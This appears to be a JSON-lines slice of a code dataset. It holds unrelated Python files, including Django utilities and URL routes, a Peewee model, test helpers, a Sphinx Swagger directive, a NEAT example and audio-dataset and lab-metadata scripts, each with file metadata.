dgs_list:\n\t\t\t\tfor c in d.content:\n\t\t\t\t\tif(dgs.good==c.good):\n\t\t\t\t\t\tdgs.consume_number += c.number\n\n\t#for dgs in dgs_list:\n\t# dgs.save()\n\tdsr.content = dgs_list\n\n\tdsr.charge_value = charge_value\n\tdsr.consume_value = consume_value\n\n\treturn dsr\n\ndef save_today_daily_statistics():\n\ttime = datetime.datetime.now()\n\tDailyStatisticsRecord.objects.filter(time__day=time.day).delete()\n\tdaily_statistics = get_today_daily_statistics(True)\n\tdaily_statistics.save()\n\tfor d in daily_statistics.content:\n\t\td.daily_statistics=daily_statistics\n\t\td.save()\n\n\tdaily_statistics = get_today_daily_statistics(False)\n\tdaily_statistics.save()\n\tfor d in daily_statistics.content:\n\t\td.daily_statistics=daily_statistics\n\t\td.save()\n\ndef get_daily_statistics(time, is_admin):\n\tnow = datetime.datetime.now()\n\tif((now-time).days==0):\n\t\tdaily_statistics = get_today_daily_statistics(is_admin)\n\telse:\n\t\tdaily_statistics = DailyStatisticsRecord.objects.get(time__day=time.day, is_admin=is_admin)\n\n\treturn daily_statistics\n\ndef get_daily_statistics_set(time, is_admin):\n\tdaily_statistics_set = DailyStatisticsRecord.objects.filter(time__month=datetime.date.today().strftime('%m'), is_admin=is_admin)\n\t#daily_statistics_set = DailyStatisticsRecord.objects.all()\n\treturn daily_statistics_set\n","sub_path":"manager/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"137295300","text":"class Util:\n def parse(self, file):\n print(\"Opening file \" + file)\n f = open(file, \"r\")\n values = []\n if f.mode == 'r':\n lines = f.readlines()\n for line in lines:\n values.append(line.strip())\n f.close()\n return 
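`Util.parse` above opens the file by hand, guards on `f.mode` (always `'r'` for a file just opened with `"r"`), and closes explicitly. A compact sketch using a context manager, which closes the handle even if iteration raises:

```python
def parse(path):
    """Return the stripped lines of a text file."""
    with open(path, "r") as f:   # the context manager closes f even on error
        return [line.strip() for line in f]

# values = parse("input.txt")  # hypothetical input file
```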
values\n","sub_path":"Day6/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201685960","text":"import xlsxwriter\r\nimport os\r\nimport urllib.request\r\nimport base64\r\noutfile = 'movieData.xlsx'\r\n\r\n\r\nos.remove(outfile)\r\nf = open(\"movieNightHTML_src.html\", \"r\")\r\nsplitArr = f.read().split(\"\")\r\n\r\n\r\nworkbook = xlsxwriter.Workbook(outfile)\r\nworksheet = workbook.add_worksheet()\r\n\r\n\r\n\r\ncount = 1\r\nfor element in splitArr:\r\n\threfIndex = element.find(\":\"\n\n Usage:\n\n app = webapp2.WSGIApplication(...)\n\n class TestCase(helper.TestCase):\n\n def testRequestSomething(self):\n result = None\n with self.webservice as http:\n res = requests.get(http + '/path')\n result = res.status_code\n self.assertEqual(result, 200)\n\n \"\"\"\n if isinstance(instance, webtest.TestApp):\n instance = instance.app\n assert isinstance(instance, webapp2.WSGIApplication)\n server = StopableWSGIServer.create(instance)\n host = server.adj.host\n port = server.adj.port\n try:\n cls.notice('Service started on %r' % [host, port])\n yield 'http://%s:%s' % (host, port)\n finally:\n cls.notice('Shutting down service on %r' % [host, port])\n server.shutdown()\n\n @property\n def webservice(self):\n \"\"\"Shortcut for constructing a service thread.\"\"\"\n assert isinstance(self.testapp, webtest.TestApp)\n return self.prepare_webservice(self.testapp.app)\n\n @classmethod\n def setUpClass(cls):\n testbed_options = cls.stub_config or {}\n cls.testbed = Testbed()\n cls.testbed.prepare(stubs=cls.stubs, **testbed_options)\n app = getattr(cls, 'getHandlers', None)\n if callable(app):\n handlers = app()\n if isinstance(handlers, webapp2.WSGIApplication):\n cls.testapp = cls.application(handlers)\n else:\n cls.testapp = cls.application_from(*list(handlers))\n return\n\n def tearDown(self):\n ndb.get_context().clear_cache()\n\n @classmethod\n def tearDownClass(cls):\n cls.testbed.deactivate()\n\n def iter_queue_tasks(self, *queue_names):\n \"\"\"\n Execute the queue. 
This assumes a sequence is already enqueued.\n\n Because this test environment does not leverage a proper web service\n thread, we simulate the queue-runner here, until the queue is empty.\n \"\"\"\n taskqueue = self.testbed.taskqueue_stub\n while True:\n tasks_performed = 0\n for q in queue_names:\n tasks = taskqueue.get_filtered_tasks(queue_names=q)\n tasks_performed = tasks_performed + len(tasks)\n logging.info('Queue runner found %d tasks' % len(tasks))\n for task in tasks:\n yield (\n q, task)\n\n if not tasks_performed:\n break\n\n def assertResponse(self, response, body=None, response_code=None, content_type=None):\n \"\"\"Shortcut for assessing one or multiple attributes of a response.\"\"\"\n self.assertIsInstance(response, webob.Response)\n if isinstance(response_code, int):\n self.assertEqual(response.status_int, response_code)\n if isinstance(response_code, (list, tuple)):\n self.assertIn(response.status_int, response_code)\n if isinstance(content_type, basestring):\n self.assertEqual(response.content_type, content_type)\n if isinstance(body, basestring):\n self.assertEqual(response.normal_body, body)\n\n\nServiceRequestCase = type('ServiceRequestCase', (TestCase,), {})\n\ndef ApplicationTestCase(application):\n \"\"\"Construct a testcase class based on an application instance.\"\"\"\n\n @classmethod\n def handlers(cls):\n return application\n\n return type('TestCase_Application', (TestCase,), {'getHandlers': handlers})","sub_path":"pycfiles/webapptitude-0.0.10.linux-x86_64.tar/testkit.py","file_name":"testkit.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"404354770","text":"\"\"\"\n Simple database example with Peewee ORM, sqlite and Python\n Here we define the schema\n Use logging for messages so they can be turned off\n\n\"\"\"\nfrom peewee import Model, CharField, BooleanField, DecimalField, SqliteDatabase\nimport logging\n\ndatabase = SqliteDatabase('customer.db')\ndatabase.connect()\ndatabase.execute_sql('PRAGMA foreign_keys = ON;') # needed for sqlite only\n\nclass BaseModel(Model):\n class Meta:\n database = database\n\nclass Customer(BaseModel):\n \"\"\"\n This class defines Customer, which maintains the details of a customer\n at HP Norton\n \"\"\"\n \n id = CharField(primary_key = True, max_length = 5)\n firstname = CharField(max_length = 30)\n lastname = CharField(max_length = 30)\n address = CharField(max_length = 30)\n phone = CharField(max_length = 12) # Format is XXX-XXX-XXXX\n email = CharField(max_length = 30)\n status = BooleanField()\n credit_limit = DecimalField(max_digits = 7, decimal_places = 2)\n","sub_path":"students/gregdevore/lesson04/assignment/customer_model.py","file_name":"customer_model.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"193419820","text":"# Copyright (c) 2011 Benaka Moorthi\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial 
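The Peewee model above only defines the schema; creating the table and rows is a separate step. A hedged usage sketch — it assumes the module is importable as `customer_model`, and the customer values are invented:

```python
from customer_model import Customer, database  # assumes the module above

database.create_tables([Customer], safe=True)  # no-op if the table exists

Customer.create(
    id="C0001", firstname="Ada", lastname="Lovelace",
    address="12 Analytical Way", phone="206-555-0100",
    email="ada@example.com", status=True, credit_limit=1500.00,
)

for c in Customer.select().where(Customer.status == True):
    print(c.id, c.firstname, c.lastname, float(c.credit_limit))
```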
portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom srmtrainer.gedit.utility import *\n\nfrom gi.repository import Gtk, Gdk\n\nclass TrainerActionGroup(Gtk.ActionGroup):\n\n ACTION_GROUP_ID = 'SRMTrainerActions'\n\n COMPETE = {\n 'id': 'SRMTrainer_Compete',\n 'lbl': 'Compete...',\n 'dsc': 'Compete in the TopCoder Arena using SRMTrainer'\n }\n \n LOADING = {\n 'id': 'SRMTrainer_Loading',\n 'lbl': 'Loading...',\n 'dsc': ''\n }\n \n PRACTICE = {\n 'id': 'SRMTrainer_Practice',\n 'lbl': 'Practice...',\n 'dsc': 'Select a past competition to practice solving'\n }\n\n SRM_TRAINER_MENU_ITEM = {\n 'id': 'SRMTrainer_Main',\n 'lbl': 'SRM Trainer',\n 'dsc': ''\n }\n\n def __init__(self, on_compete, on_practice):\n Gtk.ActionGroup.__init__(self, TrainerActionGroup.ACTION_GROUP_ID)\n\n self.add_action(make_action(TrainerActionGroup.COMPETE, on_compete))\n self.add_action(make_action(TrainerActionGroup.LOADING, None))\n self.add_action(make_action(TrainerActionGroup.SRM_TRAINER_MENU_ITEM, None))\n self.add_action(make_action(TrainerActionGroup.PRACTICE, on_practice))\n\n @property\n def compete_action(self):\n return self.get_action(TrainerActionGroup.COMPETE['id'])\n\n @property\n def loading_action(self):\n return self.get_action(TrainerActionGroup.LOADING['id'])\n\n @property\n def practice_action(self):\n return self.get_action(TrainerActionGroup.PRACTICE['id'])\n\n @property\n def srm_trainer_main_action(self):\n return self.get_action(TrainerActionGroup.SRM_TRAINER_MENU_ITEM['id'])\n\n","sub_path":"src/srmtrainer/gedit/ui/trainer_action_group.py","file_name":"trainer_action_group.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260866520","text":"from system.gui.widgets.factory import create_widget\nfrom system.gui.utils.grid import grid_configure\nfrom system.scientist.map import algo_config_map, algo_value_map\n\n\nclass SurrogateView:\n\n def __init__(self, root_view):\n self.root_view = root_view\n\n self.widget = {}\n self.label = {}\n\n self.frame = create_widget('frame', master=self.root_view.frame_surrogate, row=0, column=0)\n grid_configure(self.frame, None, 0)\n \n self.widget['name'] = create_widget('labeled_combobox',\n master=self.frame, row=0, column=0, width=20, text=algo_config_map['surrogate']['name'], \n values=list(algo_value_map['surrogate']['name'].values()), required=True)\n\n self.create_frame_param()\n\n self.curr_name = None\n\n self.activate = {\n 'Gaussian Process': self.activate_gp,\n 'Thompson Sampling': self.activate_ts,\n }\n self.deactivate = {\n 'Gaussian Process': self.deactivate_gp,\n 'Thompson Sampling': self.deactivate_ts,\n }\n\n def create_frame_param(self):\n self.frame_param = create_widget('frame', master=self.frame, row=1, column=0, padx=0, pady=0, sticky='NSEW')\n grid_configure(self.frame_param, None, 0)\n\n def select(self, name):\n if name == self.curr_name: return\n if self.curr_name is not None:\n self.deactivate[self.curr_name]()\n self.frame_param.destroy()\n self.create_frame_param()\n 
self.activate[name]()\n self.curr_name = name\n\n def activate_gp(self):\n self.label['nu'], self.widget['nu'] = create_widget('labeled_combobox',\n master=self.frame_param, row=0, column=0, width=5, text=algo_config_map['surrogate']['nu'], values=[1, 3, 5, -1], class_type='int', return_label=True,\n default=5)\n\n def deactivate_gp(self):\n for key in ['nu']:\n self.label.pop(key)\n self.widget.pop(key)\n\n def activate_ts(self):\n self.label['nu'], self.widget['nu'] = create_widget('labeled_combobox',\n master=self.frame_param, row=0, column=0, width=5, text=algo_config_map['surrogate']['nu'], values=[1, 3, 5, -1], class_type='int', return_label=True,\n default=5)\n self.label['n_spectral_pts'], self.widget['n_spectral_pts'] = create_widget('labeled_entry',\n master=self.frame_param, row=1, column=0, text=algo_config_map['surrogate']['n_spectral_pts'], class_type='int', return_label=True,\n default=100, valid_check=lambda x: x > 0, error_msg='number of spectral sampling points must be positive')\n self.label['mean_sample'], self.widget['mean_sample'] = create_widget('checkbutton',\n master=self.frame_param, row=2, column=0, text=algo_config_map['surrogate']['mean_sample'], return_label=True)\n\n def deactivate_ts(self):\n for key in ['nu', 'n_spectral_pts', 'mean_sample']:\n self.label.pop(key)\n self.widget.pop(key)\n","sub_path":"system/scientist/menu/config/algo_advanced/surrogate/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"154095193","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 18 16:25:36 2021\n\n@author: tobrien\n\nScript for compiling metadata and adding well annotions to denote bad wells\nfor disease modelling work\n\n\"\"\"\n\nimport pandas as pd\nfrom pathlib import Path\nimport re\n\nfrom tierpsytools.hydra.compile_metadata import populate_96WPs,\\\n get_day_metadata, concatenate_days_metadata, day_metadata_check, \\\n number_wells_per_plate\n\ndate_regex = r\"\\d{8}\"\n\nPROJECT_DIRECTORY = Path('/Volumes/behavgenom$/Tom/Data/Hydra/RepeatedBluelight/RawData')\n\n\n#%%\nif __name__ == '__main__':\n\n day_root_dirs = [d for d in (PROJECT_DIRECTORY /\n 'AuxiliaryFiles').glob(\"*\")\n if d.is_dir() and re.search(date_regex, str(d))\n is not None]\n\n print('Calculating metadata for {} days of experiments'.format(\n len(day_root_dirs)))\n\n for count, day in enumerate(day_root_dirs):\n exp_date = re.findall(date_regex, str(day))[0]\n manualmetadata_file = list(day.rglob('*_manual_metadata.csv'))[0]\n assert (exp_date in str(manualmetadata_file))\n wormsorter_file = list(day.rglob('*_wormsorter.csv'))[0]\n assert (exp_date in str(wormsorter_file))\n\n print('Collating manual metadata files: {}'.format(wormsorter_file))\n\n plate_metadata = populate_96WPs(wormsorter_file,\n del_if_exists=True,\n saveto='default')\n\n\n metadata_file = day / '{}_day_metadata.csv'.format(exp_date)\n\n print('Generating day metadata: {}'.format(\n metadata_file))\n\n day_metadata = get_day_metadata(plate_metadata,\n manualmetadata_file,\n saveto=metadata_file,\n del_if_exists=True)\n\n \n files_to_check = day_metadata_check(day_metadata, day, plate_size=48)\n number_wells_per_plate(day_metadata, day)\n\n# %%\n import datetime\n # combine all the metadata files\n concat_meta = concatenate_days_metadata(PROJECT_DIRECTORY / 'AuxiliaryFiles',\n list_days=None,\n saveto=None)\n \n \n concat_meta_grouped = 
concat_meta.groupby('worm_gene')\n\n strains = pd.DataFrame(concat_meta_grouped.apply(lambda x: x.drop_duplicates(subset='worm_strain')))\n strains.reset_index(drop=True,\n inplace=True)\n \n strains = strains[['worm_gene',\n 'worm_strain',\n 'worm_code',\n 'date_yyyymmdd']]\n \n strains.to_csv(PROJECT_DIRECTORY / \\\n '{}_strain_name_errors.csv'.format(\n datetime.datetime.today().strftime('%Y%m%d')\n ),\n index=False)\n\n#%%\n\nfrom tierpsytools.hydra.match_wells_annotations import import_wells_annotations_in_folder, update_metadata # if your tierpsytools is super up to date, the typo in the first function has been fixed \naux_dir = Path('/Volumes/behavgenom$/Tom/Data/Hydra/RepeatedBluelight/RawData/AuxiliaryFiles')\nannotations_df = import_wells_annotations_in_folder(aux_dir)\nannotations_df.rename(columns={'imgstore_prestim':'imgstore'}, inplace=True)\nannotations_df['is_bad_well'] = annotations_df['well_label'] != 1\nwells_annotated_metadata = update_metadata(aux_dir, annotations_df, del_if_exists=True) ","sub_path":"compile_metadata_and_tierpsy_analysis_files/compile_metadata_and_well_annotations_for_non_standard_video_types.py","file_name":"compile_metadata_and_well_annotations_for_non_standard_video_types.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201432032","text":"#this source is to get simple ex01.tml\nfrom bs4 import BeautifulSoup\nimport requests\n\n#read file from network, zerobizcoin@nate.com\nbaseurl = 'http://ec2-13-125-20-194.ap-northeast-2.compute.amazonaws.com//quizbot/ex01'\nbaseurl = 'http://13.125.20.194/quizbot/ex01'\n\nhtml = requests.get(baseurl).text\nsoup = BeautifulSoup(html, 'lxml')\n\n#bring text from p tag\nexclass_div = soup.find(\"div\", {'class':'ex_class'})\nmessage_p = exclass_div.find(\"p\")\nprint(message_p.get_text())\n","sub_path":"cr1.py","file_name":"cr1.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"549530659","text":"from django.conf.urls import url\n\nfrom . 
import views\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'update_responses/', views.update_responses, name='update_responses'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.getq, name='questions'),\n url(r'postaquestion/', views.postaq, name='postaq'), \n url(r'createprofile/', views.createprofile, name='createprofile'),\n url(r'editprofile/', views.editprofile, name='editprofile'),\n url(r'filter/', views.filter, name='filter'),\n url(r'loginpage/', views.loginpage, name='loginpage'),\n url(r'about/', views.about, name='about'),\n url(r'edit_response/', views.edit_response, name='edit_response'),\n\turl(r'inappropriate_qs/', views.inappropriate_qs, name='inappropriate_qs'),\n\turl(r'inappropriate_rs/', views.inappropriate_rs, name='inappropriate_rs'),\n\turl(r'flagged_users/', views.flagged_users, name='flagged_users'),\n\turl(r'see_user_history/', views.see_user_history, name='see_user_history'),\n\turl(r'admin/', views.admin, name='admin'),\n url(r'hidden_qs/', views.hidden_qs, name='hidden_qs'),\n url(r'hidden_rs/', views.hidden_rs, name='hidden_rs'),\n url(r'mark_response/', views.mark_response, name='mark_response'),\n url(r'flag_response/', views.flag_response, name='flag_response'),\n url(r'flag_question/', views.flag_question, name='flag_question'),\n\turl(r'see_mod_history/', views.see_mod_history, name='see_mod_history'),\n url(r'error/', views.error, name='error'),\n url(r'^(?P.+)/$', views.filtertag, name='filtertag'),\n]\n","sub_path":"tigertalk/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"611704425","text":"# Copyright (C) 2020 Shahin Amiriparian, Michael Freitag, Maurice Gerczuk, Björn Schuller\n#\n# This file is part of auDeep.\n#\n# auDeep is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# auDeep is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with auDeep. 
If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"Parser for the ComParE 2020 Mask (M) dataset\"\"\"\nimport abc\nfrom pathlib import Path\nfrom typing import Optional, Mapping, Sequence\n\nimport pandas as pd\n\nfrom audeep.backend.data.data_set import Partition\nfrom audeep.backend.log import LoggingMixin\nfrom audeep.backend.parsers.base import Parser, _InstanceMetadata\n\n_COMPARE20_MASK_LABEL_MAP = {\n    \"0\": 0,\n    \"1\": 1,\n}\n\n\nclass Compare20MaskParser(LoggingMixin, Parser):\n\n    def __init__(self, basedir: Path):\n        super().__init__(basedir)\n        self._metadata_cache = None\n        self._audio_dir = basedir / \"wav\"\n\n    @abc.abstractmethod\n    def label_key(self) -> str:\n        pass\n\n    def _metadata(self) -> pd.DataFrame:\n        if not self.can_parse():\n            raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n        if self._metadata_cache is None:\n            # Define partition names (according to audio files)\n            partitions = ['train', 'devel', 'test']\n\n            # Load file list\n            label_paths = [self._basedir / \"binary_lab\" / 'labels_{}.tsv'.format(part) for part in partitions]\n            self._metadata_cache = pd.concat([pd.read_csv(path, sep='\\t') for path in label_paths])\n\n        return self._metadata_cache\n\n    def can_parse(self) -> bool:\n        metadata_file = self._basedir / \"binary_lab\" / \"labels_devel.tsv\"\n\n        if not self._audio_dir.exists():\n            self.log.debug(\"cannot parse: audio directory at %s missing\", self._audio_dir)\n\n            return False\n\n        if not metadata_file.exists():\n            self.log.debug(\"cannot parse: metadata file at %s missing\", metadata_file)\n\n            return False\n\n        return True\n\n    @property\n    def label_map(self) -> Optional[Mapping[str, int]]:\n        if not self.can_parse():\n            raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n        return _COMPARE20_MASK_LABEL_MAP\n\n    @property\n    def num_instances(self) -> int:\n        if not self.can_parse():\n            raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n        # test instances are not contained in label tsv file\n        return len(list(self._audio_dir.glob(\"*.*\")))\n\n    @property\n    def num_folds(self) -> int:\n        if not self.can_parse():\n            raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n        return 0\n\n    def parse(self) -> Sequence[_InstanceMetadata]:\n        if not self.can_parse():\n            raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n        meta_list = []\n\n        metadata = self._metadata()\n\n        for file in sorted(self._audio_dir.glob(\"*.wav\")):\n            label_nominal = metadata.loc[metadata[\"file_name\"] == file.name][\"label\"]\n\n            # test labels are '?'\n            if all(l != '?' 
for l in label_nominal):\n label_nominal = label_nominal.iloc[0]\n else:\n label_nominal = None\n\n instance_metadata = _InstanceMetadata(\n path=file,\n filename=file.name,\n label_nominal=str(label_nominal),\n label_numeric=None, # inferred from label map\n cv_folds=[],\n partition=Partition.TRAIN if file.name.startswith(\"train\") else Partition.DEVEL if file.name.startswith(\n \"devel\") else Partition.TEST\n )\n\n self.log.debug(\"parsed instance %s: label = %s\", file.name, label_nominal)\n meta_list.append(instance_metadata)\n\n return meta_list\n","sub_path":"baseline/hss15.py","file_name":"hss15.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616101653","text":"# -*- coding: utf-8 -*-\nfrom docutils import nodes\nfrom docutils.parsers.rst import Directive, roles, directives\nfrom sphinxcontrib.httpdomain import HTTPGet\nimport traceback\nimport os\nfrom sphinx.errors import SphinxError\n\nfrom sphinx.locale import _\n\nfrom six.moves.urllib import parse as urlparse # Retain Py2 compatibility for urlparse\nimport requests\nimport json\n\n\nclass SwaggerDocDirective(Directive):\n\n required_arguments = 1\n has_content = False\n final_argument_whitespace = True # Just in case you are storing documents in a path that has whitespace.\n\n def process_source(self, url):\n \"\"\"\n Fetch and parse the JSON containing the `Resource Listing`_.\n \n https://github.com/OAI/OpenAPI-Specification/blob/master/versions/1.2.md#51-resource-listing\n \n Args:\n url (str): HTTP(S) URL or relative/absolute path in the sphinx source folder.\n\n Returns:\n dict: Containing the contents of the resource listing\n \"\"\"\n parsed_url = urlparse.urlparse(url)\n \n if not parsed_url.scheme: # Assume file relative to documentation\n env = self.state.document.settings.env\n relfn, absfn = env.relfn2path(url)\n\n if not os.path.exists(absfn):\n raise self.error(\"File not found: %s\" % absfn)\n\n env.note_dependency(relfn)\n\n with open(absfn) as fd:\n content = fd.read()\n\n return json.loads(content)\n else:\n s = requests.Session()\n r = s.get(url)\n return r.json()\n\n def _field_list_item(self, label, value):\n \"\"\"Convenience method to create field list items.\n \n Args:\n label: Label text \n value: Value text \n\n Returns:\n nodes.Field Item that may be appended to a field list\n \"\"\"\n field = nodes.field()\n field += nodes.field_name(text=label)\n fb = nodes.field_body()\n field += fb\n fb += nodes.paragraph(text=value)\n \n return field\n\n def parameters(self, parameters):\n \"\"\"Yield parameter information as field lists\"\"\"\n fl = nodes.field_list()\n \n for parameter in parameters:\n fl += self._field_list_item(parameter['name'], parameter['description'])\n\n yield fl\n\n def operations(self, operations, path):\n \"\"\"Create nodes for an Operation object which typically represents a single HTTP VERB request to one endpoint.\n \n Args:\n operations (list): List of Operation object as described in \n https://github.com/OAI/OpenAPI-Specification/blob/master/versions/1.2.md#523-operation-object\n path (str): The resource path given from the API Object\n \n Yields:\n nodes\n \"\"\"\n for operation in operations:\n\n if 'method' in operation:\n method = operation['method'].upper()\n elif 'httpMethod' in operation: # Because my vendor is dumb\n method = operation['httpMethod'].upper()\n\n yield nodes.subtitle(text='{} {}'.format(method, path))\n if 'summary' in operation:\n yield 
nodes.paragraph(text=operation['summary'])\n\n if 'notes' in operation:\n opnote = nodes.note()\n opnote += nodes.paragraph(text=operation['notes'])\n yield opnote\n\n if 'parameters' in operation:\n for parameter in self.parameters(operation['parameters']):\n yield parameter\n\n def api_endpoints(self, api_objects):\n \"\"\"Create nodes for api_objects as a generator.\n \n Args:\n api_objects (list): List of API Objects\n Yields:\n docutils nodes\n \"\"\"\n for api in api_objects:\n print('Creating nodes for API with path: {}'.format(api['path']))\n yield nodes.title(text=api['path'])\n yield nodes.paragraph(text=api['description'])\n\n for operation in self.operations(api.get('operations', []), api['path']):\n yield operation\n\n def create_declaration(self, declaration):\n \"\"\"Create nodes for an API Declaration. This is the root level dict.\n \n Args:\n declaration (dict): The root level of an API Declaration \n\n Returns:\n A section containing the API documentation\n \"\"\"\n s = nodes.section(ids=[declaration['resourcePath']])\n s += nodes.title(text='API')\n\n fl = nodes.field_list()\n if 'swaggerVersion' in declaration:\n fl += self._field_list_item('Swagger', declaration['swaggerVersion'])\n\n if 'apiVersion' in declaration:\n fl += self._field_list_item('API Version', declaration['apiVersion'])\n\n if 'basePath' in declaration:\n fl += self._field_list_item('Base Path', declaration['basePath'])\n\n if 'resourcePath' in declaration:\n fl += self._field_list_item('Resource Path', declaration['resourcePath'])\n\n s += fl\n\n for element in self.api_endpoints(declaration.get('apis', [])):\n s += element\n\n return s\n\n def run(self):\n try:\n source_url = self.arguments[0]\n swaggerdoc = self.process_source(source_url)\n\n return [self.create_declaration(swaggerdoc)]\n except:\n print('Unable to process URL: %s' % self.arguments[0])\n traceback.print_exc()\n error = nodes.error('')\n para = nodes.paragraph()\n para += nodes.Text('Unable to process URL: ')\n para += nodes.strong('', self.arguments[0])\n para += nodes.Text('. 
Please check that the URL is a valid Swagger api-docs URL and it is accessible')\n            error += para\n            return [error]\n","sub_path":"sphinxcontrib/swaggerdoc/swagger_doc.py","file_name":"swagger_doc.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40163598","text":"\"\"\" 2-input XOR example \"\"\"\nfrom __future__ import print_function\n\nimport os\n\nfrom neat import nn, population, statistics\nfrom sklearn.metrics import log_loss\nfrom utils import gen_data\nfrom fitness import *\nimport visualize\n\ninputs,outputs = gen_data()\n# Network inputs and expected outputs.\n\ndef eval_fitness(genomes):\n    for g in genomes:\n        net = nn.create_feed_forward_phenotype(g)\n        mse = 0.0\n        for i,o in zip(inputs,outputs):\n            output = net.serial_activate(i)\n            mse += sum([(i-j)**2 for i,j in zip(o,output)])\n        # tot_fit = 0.0\n        # for i,expected in zip(inputs,outputs):\n        #     output = net.serial_activate(i)\n        #     output = [1 if o>0.5 else 0 for o in output]\n        #     tot_fit += abs_dis_fitness(output,expected)\n        g.fitness = 1- mse\n\nlocal_dir = os.path.dirname(__file__)\nconfig_path = os.path.join(local_dir, 'mul_config')\npop = population.Population(config_path)\npop.run(eval_fitness, 300)\n\nprint('Number of evaluations: {0}'.format(pop.total_evaluations))\n\n# Display the most fit genome.\nwinner = pop.statistics.best_genome()\nprint('\\nBest genome:\\n{!s}'.format(winner))\n\n# Verify network output against training data.\nprint('\\nOutput:')\nwinner_net = nn.create_feed_forward_phenotype(winner)\nfor i, expected in zip(inputs, outputs):\n    output = winner_net.serial_activate(i)\n    print(\"expected {} got {}\".format(expected, output))\n\n# Visualize the winner network and plot/log statistics.\nvisualize.plot_stats(pop.statistics)\nvisualize.plot_species(pop.statistics)\nvisualize.draw_net(winner, view=True, filename=\"mul.gv\", show_disabled=False, prune_unused=True)\nstatistics.save_stats(pop.statistics)\nstatistics.save_species_count(pop.statistics)\nstatistics.save_species_fitness(pop.statistics)\n","sub_path":"final_proj/src/multiply/mul.py","file_name":"mul.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219699854","text":"import os\nimport time\nimport logging\nimport unittest\n\nfrom irrad_control import config_path\nfrom irrad_control.utils.tools import load_yaml\nfrom irrad_control.utils.daq_proc import DAQProcess\n\n\nclass BaseDAQProcess(DAQProcess):\n\n    def __init__(self):\n        super(BaseDAQProcess, self).__init__(name='TestDAQProcess', commands={})\n\n    # Define clean up\n    def clean_up(self):\n        pass\n\n\nclass TestDAQProcess(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n\n        # Create process\n        cls.daq_proc = BaseDAQProcess()\n\n        # Launch process\n        cls.daq_proc.start()\n\n        # Wait until process is created with irrad.pid file\n        start = time.time()\n        while not os.path.isfile(os.path.join(config_path, '.irrad.pid')):\n            time.sleep(0.2)\n\n            # Wait max 5 seconds\n            if time.time() - start > 5:\n                break\n\n    @classmethod\n    def tearDownClass(cls):\n        # Send SIGTERM\n        cls.daq_proc.terminate()\n\n        # Wait until down\n        cls.daq_proc.join()\n\n        # Check pid file is gone\n        assert not os.path.isfile(os.path.join(config_path, '.irrad.pid'))\n\n    def test_pid_file_content(self):\n\n        pid_file_content = load_yaml(os.path.join(config_path, '.irrad.pid'))\n\n        # Check that it is not empty\n        assert pid_file_content\n\n        # Check that 
